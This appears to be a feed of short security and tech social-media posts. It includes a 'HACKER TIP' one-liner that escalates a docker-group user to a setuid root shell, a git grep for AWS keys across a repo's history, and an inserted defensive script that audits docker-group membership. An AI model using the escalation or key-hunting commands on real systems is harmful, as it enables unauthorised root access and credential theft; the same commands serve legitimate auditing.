It's seemingly becoming more and more popular to hide malicious payloads in SGX enclaves: https://arxiv.org/abs/1710.00551
"Lastpass is storing the 2FA secret seed under a URL that can be derived from your password."
http://www.martinvigo.com/design-flaws-lastpass-2fa-implementation/
Mastodon's federated timeline might need this now that it's so popular: https://github.com/tootsuite/mastodon/issues/691
HACKER TIP: If you pop a low-priv Linux shell, don't forget to check if the user is in the "docker" group. If so, a root shell is only one line away:
$ docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
screenshots and more here on my (crappy) blog: http://zacharykeeton.com/Linux_Privilege-Escalation-with-Docker/
SysAdmin tip: Don't add any nonsudoers to the 'docker' group!
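One way to audit for the condition in the SysAdmin tip above, as an added example that is not part of the original post: list accounts that are in the docker group (by member list or primary gid) but in no admin group. The function names, the admin group names (sudo, wheel, admin) and the sample accounts are assumptions made for illustration.

```sh
#!/bin/sh
# Added example: find accounts in the "docker" group that have no sudo
# rights through an admin group. Assumption: admin groups are named
# sudo, wheel or admin; per-user sudoers entries are not parsed.

# docker_nonsudoers GROUP_FILE PASSWD_FILE -> one username per line
docker_nonsudoers() {
    awk -F: -v admins="sudo wheel admin" '
        BEGIN { n = split(admins, a, " "); for (i = 1; i <= n; i++) is_admin[a[i]] = 1 }
        # First file, group database: name:passwd:gid:member,member,...
        FNR == NR {
            gid_name[$3] = $1
            m = split($4, members, ",")
            for (i = 1; i <= m; i++) {
                if ($1 == "docker") in_docker[members[i]] = 1
                if ($1 in is_admin) in_admin[members[i]] = 1
            }
            next
        }
        # Second file, passwd database: field 4 is the primary gid, which
        # grants membership without the user being in the member list.
        {
            primary = gid_name[$4]
            if (primary == "docker") in_docker[$1] = 1
            if (primary in is_admin) in_admin[$1] = 1
        }
        END { for (u in in_docker) if (!(u in in_admin)) print u }
    ' "$1" "$2" | sort
}

# write_sample DIR: constructed group and passwd files (not real accounts)
write_sample() {
    cat > "$1/group" <<'EOF'
root:x:0:
sudo:x:27:alice
docker:x:998:alice,bob
users:x:100:
EOF
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:x:1000:100::/home/alice:/bin/bash
bob:x:1001:100::/home/bob:/bin/bash
carol:x:1003:998::/home/carol:/bin/bash
EOF
}

sample_dir=$(mktemp -d)
write_sample "$sample_dir"
docker_nonsudoers "$sample_dir/group" "$sample_dir/passwd"   # bob, carol
rm -rf "$sample_dir"
```

On a live host, pass /etc/group and /etc/passwd; where accounts come from a directory service, save the output of getent group and getent passwd to files and pass those instead.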
How to look through a git repo for AWS keys:
git rev-list --all | xargs git grep -E 'AK[A-Z0-9]{18}'
And people want everyone to run anything written by Poettering?
BSD FTW (and forever!)
I, for one, look forward to the release of gubernetes https://mastodon.cloud/media/ZjSwL-A3XNRGb4u1rwk
gnuplot is still my favorite graph program
middle of my talk: awesome
beginning and ending: needs work
remote unauthenticated RCE in Linux via specially crafted UDP packets https://nvd.nist.gov/vuln/detail/CVE-2016-10229 via @liamo
I think Mastodon is a ploy by ICANN to get people to buy generic TLDs
Remembering to design for failure is a critical part of engineering reliable systems
Probably the most important thing I've learned about web services is learning to make them degrade gracefully. What happens when the database is slow/down? What happens when you can't check the auth token? etc. etc.
why do Linux people seem to all still use Google Plus?
are there any business books that aren't just anecdata?
anyone else getting mobbed by spam calls? I get five to six spam phone calls every day now
my first block on mastodon. we have arrived
Mastodon is scaling better than VC funded products with hundreds of engineers
I've always thought Twitter should be a public utility and not a for profit company. Mastodon is really, really close to that idea